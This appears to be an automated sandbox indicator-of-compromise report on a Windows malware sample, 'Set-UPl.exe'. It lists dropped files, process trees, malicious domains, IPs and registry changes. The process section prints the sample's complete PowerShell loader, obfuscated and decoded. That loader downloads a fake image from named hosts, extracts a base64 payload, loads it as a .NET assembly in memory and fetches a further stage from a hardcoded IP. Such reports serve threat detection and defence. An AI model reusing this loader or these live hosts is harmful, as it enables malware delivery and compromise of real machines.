IOC Report
Set-UPl.exe


Files

File Path
Type
Category
Malicious
Set-UPl.exe
PE32+ executable (GUI) x86-64, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Temp\IXP000.TMP\6793fbe82c030.vbs
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f1swiemy.gjq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gi5kpagl.hkm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h4n1ydx1.sy2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lnymlewc.x3h.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nmciu0e4.tc5.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p4eaxv0w.vy2.psm1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\Set-UPl.exe
"C:\Users\user\Desktop\Set-UPl.exe"
malicious
C:\Windows\System32\cmd.exe
cmd.exe /c 6793fbe82c030.vbs
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\6793fbe82c030.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@B0@H@@Og@v@C8@dQBw@HQ@bwBk@GE@d@Bl@HM@eQBz@HQ@ZQBt@C4@YwBv@G0@LwB0@GU@cwB0@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@
bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@UwB1@GI@cwB0@HI@aQBu@Gc@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@L@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@d@Bl@Hg@d@@g@D0@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@7@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FI@ZQBm@Gw@ZQBj@HQ@aQBv@G4@LgBB@HM@cwBl@G0@YgBs@Hk@XQ@6@Do@T@Bv@GE@Z@@o@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@KQ@7@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@
QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@bQBl@HQ@a@Bv@GQ@I@@9@C@@J@B0@Hk@c@Bl@C4@RwBl@HQ@TQBl@HQ@a@Bv@GQ@K@@n@Gw@ZgBz@Gc@ZQBk@GQ@Z@Bk@GQ@Z@Bk@GE@Jw@p@C4@SQBu@HY@bwBr@GU@K@@k@G4@dQBs@Gw@L@@g@Fs@bwBi@Go@ZQBj@HQ@WwBd@F0@I@@o@Cc@I@B0@Hg@d@@u@Gs@YwBw@HI@YQBl@G0@LwBz@GU@b@Bp@GY@XwBj@Gk@b@Bi@HU@c@@v@DQ@Ng@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'http://uptodatesystem.com/test/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.kcpraem/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
carrystuppeder.net
malicious
flockefaccek.org
malicious
classyhelped.net
malicious
toppyneedus.biz
malicious
climepunneddus.com
malicious
https://guardeduppe.com/api
188.114.96.3
malicious
babberstalek.org
malicious
http://uptodatesystem.com
unknown
malicious
rebuildhurrte.com
malicious
guardeduppe.com
malicious
http://uptodatesystem.com/test/test.jpg
unknown
malicious
https://bbuseruploads.s3.amazonaws.com
unknown
https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
unknown
https://guardeduppe.com:443/api
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://web-security-reports.services.atlassian.com/csp-report/bb-website
unknown
https://guardeduppe.com/apim
unknown
https://guardeduppe.com/pi
unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
unknown
https://aka.ms/pscore6
unknown
https://guardeduppe.com/
unknown
https://bbuseruploads.s3.amazonaws.com/a613a3a7-960e-457b-ade9-adac2ded05f8/downloads/c8ee6340-249a-
unknown
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
unknown
https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
unknown
https://dz8aopenkvv6s.cloudfront.net
unknown
https://github.com/Pester/Pester
unknown
http://62.60.226.64/public_files/mearpck.txt
62.60.226.64
https://guardeduppe.com//
unknown
https://guardeduppe.com/apiG9
unknown
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
unknown
https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
unknown
https://cdn.cookielaw.org/
unknown
https://guardeduppe.com/wm
unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
unknown
https://aui-cdn.atlassian.com/
unknown
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
unknown
https://aka.ms/pscore68
unknown
https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113
185.166.143.48
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://bitbucket.org
unknown
https://guardeduppe.com/2U
unknown

Domains

Name
IP
Malicious
uptodatesystem.com
unknown
malicious
s3-w.us-east-1.amazonaws.com
52.217.234.17
bitbucket.org
185.166.143.48
bg.microsoft.map.fastly.net
199.232.210.172
s-part-0017.t-0009.fb-t-msedge.net
13.107.253.45
guardeduppe.com
188.114.96.3
bbuseruploads.s3.amazonaws.com
unknown
languageslearning.click
unknown
198.187.3.20.in-addr.arpa
unknown

IPs

IP
Domain
Country
Malicious
188.114.97.3
unknown
European Union
malicious
62.60.226.64
unknown
Iran (ISLAMIC Republic Of)
185.166.143.48
bitbucket.org
Germany
188.114.96.3
guardeduppe.com
European Union
52.217.234.17
s3-w.us-east-1.amazonaws.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
wextract_cleanup0
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory

Memdumps
